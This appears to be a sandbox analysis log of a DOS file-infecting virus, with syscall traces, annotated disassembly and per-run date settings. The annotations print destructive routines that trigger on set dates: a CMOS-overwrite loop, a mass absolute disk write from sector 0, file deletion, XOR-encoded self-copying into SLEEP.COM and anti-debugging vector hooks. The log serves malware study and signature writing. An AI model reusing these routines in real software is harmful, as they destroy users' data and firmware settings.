2018-12-25T12:41:53.661257122Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:53.681493296Z 62 PC: 12dab | Close file
2018-12-25T12:41:53.689157171Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.692789448Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.700341855Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.706371277Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.70855787Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.710065742Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.712764369Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.715217685Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.717705675Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.726094063Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.734397835Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.737582497Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.744301411Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.750868923Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.755994819Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.757370389Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.760058239Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.762160273Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.764679967Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.774055085Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.78558999Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.788494687Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.794861992Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.802049458Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.803628648Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.805232013Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.808669945Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.810407845Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.812957223Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.8219315Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.829876501Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.832699858Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.845788723Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.852275402Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.854293797Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.856004901Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.859857186Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.861338559Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.863666545Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.872264707Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.880027803Z 26 PC: 12aeb | Set disk transfer address
; Window at the return from DOS Get date (int 21h, AH=2Ah; DH = month, DL = day): date checks gating three routines.
2018-12-25T12:41:53.881300201Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7  ; month == 7 ?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe  ; day == 14 ?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e  ; reached only on 14 July; 0x12b2e is outside this window
0x12b04: mov ah, 0x2a  ; Get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date a third time
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; window ends here; the branch that follows is not shown
; Window at the return from the second Get date (DH = month, DL = day): remaining trigger checks and the start of the routine at 0x12b2e.
2018-12-25T12:41:53.883943281Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date again
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL starts at 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al  ; window ends here; the loop condition is not shown
; Window at the return from the third Get date (DH = month): month and time checks, the port 0x70/0x71 loop, and the start of the routine at 0x12b3b.
2018-12-25T12:41:53.886310151Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; window ends before CX and DX are used
0x12b42: mov dx, 0
2018-12-25T12:41:53.88869544Z 19 PC: 12b55 | Delete file
; Window at the return from Get time (DL = hundredths of a second): time check, the port 0x70/0x71 loop, the absolute-disk-write routine at 0x12b3b, and the start of 0x12b4b.
2018-12-25T12:41:53.895126017Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; sector count for int 26h: 0x1111 = 4369
0x12b42: mov dx, 0  ; starting logical sector 0
0x12b45: int 0x26  ; DOS absolute disk write to drive AL; the DS:BX buffer is not set in this window. Not an int 21h call, so presumably not logged as a row
0x12b47: add sp, 2  ; int 26h leaves the flags word on the stack; discard it
0x12b4a: ret
0x12b4b: mov ah, 0x13  ; separate routine: AH=13h is DOS delete file via FCB; the rest is outside this window
0x12b4d: push cs

{"DateBased":true,"Day":14,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.240014121Z 26 PC: 12a73 | Set disk transfer address
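2018-12-25T12:41:54.241675512Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input'; note: that name is DOS function 01h, whereas interrupt vector 1 is the CPU single-step trap)
2018-12-25T12:41:54.242738657Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input'; note: that name is DOS function 03h, whereas interrupt vector 3 is the breakpoint interrupt)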
2018-12-25T12:41:54.243724268Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.250535329Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.256776262Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.263716163Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.265358395Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.2678683Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.270853523Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-25T12:41:54.272479009Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0  ; single-byte XOR; immediate as captured in this window (0 here), before the store at 0x12d92 runs
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.276107863Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.291086209Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.299767817Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.303805838Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.310944314Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.317842236Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.320157788Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.322186487Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.325434325Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.32784113Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.330888983Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.339177755Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.347085356Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.350583754Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.358911671Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.371146645Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.376777382Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.378526333Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.381104517Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.38306195Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.385497479Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.393653443Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.402295475Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.404903275Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.41234721Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.419359224Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.421790878Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.423451395Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.426299114Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.428279497Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.431421839Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.439479104Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.447617549Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.450398725Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.457021994Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.463971481Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.465403988Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.466744012Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.469927842Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.47132856Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.474104126Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.482412524Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.490214134Z 26 PC: 12aeb | Set disk transfer address
; Window at the return from DOS Get date (int 21h, AH=2Ah; DH = month, DL = day): date checks gating three routines.
2018-12-25T12:41:54.491341336Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7  ; month == 7 ?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe  ; day == 14 ?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e  ; reached only on 14 July; 0x12b2e is outside this window
0x12b04: mov ah, 0x2a  ; Get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date a third time
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; window ends here; the branch that follows is not shown
; Window at the return from the second Get date (DH = month, DL = day): remaining trigger checks and the start of the routine at 0x12b2e.
2018-12-25T12:41:54.494814745Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date again
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL starts at 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al  ; window ends here; the loop condition is not shown
; Window at the return from the third Get date (DH = month): month and time checks, the port 0x70/0x71 loop, and the start of the routine at 0x12b3b.
2018-12-25T12:41:54.496938589Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; window ends before CX and DX are used
0x12b42: mov dx, 0
2018-12-25T12:41:54.49967826Z 19 PC: 12b55 | Delete file
; Window at the return from Get time (DL = hundredths of a second): time check, the port 0x70/0x71 loop, the absolute-disk-write routine at 0x12b3b, and the start of 0x12b4b.
2018-12-25T12:41:54.506412643Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; sector count for int 26h: 0x1111 = 4369
0x12b42: mov dx, 0  ; starting logical sector 0
0x12b45: int 0x26  ; DOS absolute disk write to drive AL; the DS:BX buffer is not set in this window. Not an int 21h call, so presumably not logged as a row
0x12b47: add sp, 2  ; int 26h leaves the flags word on the stack; discard it
0x12b4a: ret
0x12b4b: mov ah, 0x13  ; separate routine: AH=13h is DOS delete file via FCB; the rest is outside this window
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.72435021Z 26 PC: 12a73 | Set disk transfer address
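2018-12-25T12:41:54.726537698Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input'; note: that name is DOS function 01h, whereas interrupt vector 1 is the CPU single-step trap)
2018-12-25T12:41:54.738844298Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input'; note: that name is DOS function 03h, whereas interrupt vector 3 is the breakpoint interrupt)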
2018-12-25T12:41:54.740173164Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.746794284Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.753642634Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.760305505Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.762074839Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.765903008Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.768724045Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-25T12:41:54.770416381Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0  ; single-byte XOR; immediate as captured in this window (0 here), before the store at 0x12d92 runs
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.773442578Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.788431026Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.812896753Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.817357374Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.823772065Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.83042243Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.832811062Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.838164615Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.84108446Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.84364821Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.846592689Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.855993957Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.864283243Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.867679776Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.874745359Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.881471685Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.891819535Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.893459764Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.896341875Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.898501099Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.901132003Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.9094081Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.918673896Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.92146762Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.927923472Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.935120202Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.936758599Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.938389259Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.942189546Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.943878788Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.946455057Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.955629202Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.963445926Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.966224963Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.97328157Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.979841412Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.981463522Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.98368587Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.986724222Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.98830132Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.990753197Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.000082575Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.007608717Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.008497271Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.010469789Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.01262908Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.01473084Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.779540756Z 26 PC: 12a73 | Set disk transfer address
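2018-12-25T12:41:54.781704897Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input' [viewer label; vector 01h is the CPU single-step/debug trap, not DOS function 01h])
2018-12-25T12:41:54.783194888Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input' [viewer label; vector 03h is the breakpoint interrupt, not DOS function 03h; replacing vectors 1 and 3 is commonly an anti-debugging step])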
2018-12-25T12:41:54.78470426Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.799450049Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.813504282Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.819925722Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.822531069Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.824046274Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.82690109Z 66 PC: 12d8e | Move file pointer
; Disassembly window printed by the viewer at the return address of the
; "Get time" call (INT 21h AH=2Ch; DL = hundredths of a second on return).
; Visible sequence: save DL, run the XOR loop at 0x12dac over 0x336 bytes,
; write 0x375 (885) bytes starting at [bp+0x106], run the same XOR loop
; again, close the handle, return.
; The image written is bp+0x106 .. bp+0x47a and the XORed range is
; bp+0x120 .. bp+0x455, so the first 0x1a and last 0x25 bytes of every copy
; are left un-XORed. NOTE(review): if the key really varies per copy, those
; fixed bytes are the stable anchor for a signature - confirm on samples.
